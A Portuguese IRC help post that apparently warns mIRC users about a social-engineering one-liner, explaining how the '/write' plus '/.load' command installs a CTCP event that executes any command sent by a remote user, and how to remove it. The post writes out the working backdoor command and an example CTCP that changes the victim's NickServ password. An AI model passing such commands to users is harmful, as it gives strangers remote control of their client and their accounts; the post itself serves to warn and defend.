/write e /ctcp

Ora bem, depois de assistir a inúmeros pedidos de ajuda devido a utilizadores terem executado este comando:

//write ^ ctcp *:^:$2- | /.load -rs ^

Vou explicar o que faz. E o porquê de não ser aconselhável fazer comandos desconhecidos, seja deste ou de outro tipo qualquer.
Para que não se criem mais lendas de super-hackers que mudam passwords de nicks e fazem ghost, mas que no fundo são apenas lamers.

A primeira coisa:

Aquela barra vertical ("|") permite executar dois comando num só, neste caso. Poderiam ser quantos quiséssemos.

Então temos o primeiro comando que é:

//write ^ ctcp *:^:$2-

O comando /write, cria ou escreve num ficheiro algo. Neste caso criar um ficheiro de nome "^" escrevendo nele "ctcp *:^:$2-"

Quanto ao segundo comando que é:

/.load -rs ^

Este faz o load do ficheiro que foi criado, para permitir que a modificação na resposta a uma msg ctcp seja efectuada.

Para quem não sabe, o mirc é um cliente bastante flexível e que permite modificações, não só ao nível de aspecto.

O que significa afinal o que é escrito no tal ficheiro e que depois é carregado? O "ctcp *:^:$2-" ?

Este é um evento. Que é activado quando uma msg ctcp (Pelo comando: /ctcp identificador nick texto) iniciado por ^ chega ao nosso mirc.
Ao chegar esse evento, o mirc executa o $2- que neste caso retorna tudo o que vem à frente do ^. Ou seja, no fundo nós estamos a modificar a forma como o mirc reage ao receber um ctcp. E neste caso, reage fazendo o comando que vem no ctcp.

Ou seja:
Num comando do tipo: /ctcp ^ _deXter /nickserv set password 123456
O $2- retorna "/nickserv set password 123456".

Ou seja, ao enviarem esse comando ele é executado no vosso script sem que vocês dêem conta disso.

Este é só um exemplo. Porque com este acesso é bastante fácil, por exemplo, desligar um pc, fechar o mirc, etc.

Neste caso, para se livrarem disto teriam que fazer: /unload -rs ^

No entanto, este comando varia conforme o nome dado ao ficheiro criado.

Fica o apelo, sempre que lhes derem comandos desconhecidos para fazer, dirijam-se ao #pthelp e perguntem o que faz o comando.

By _deXter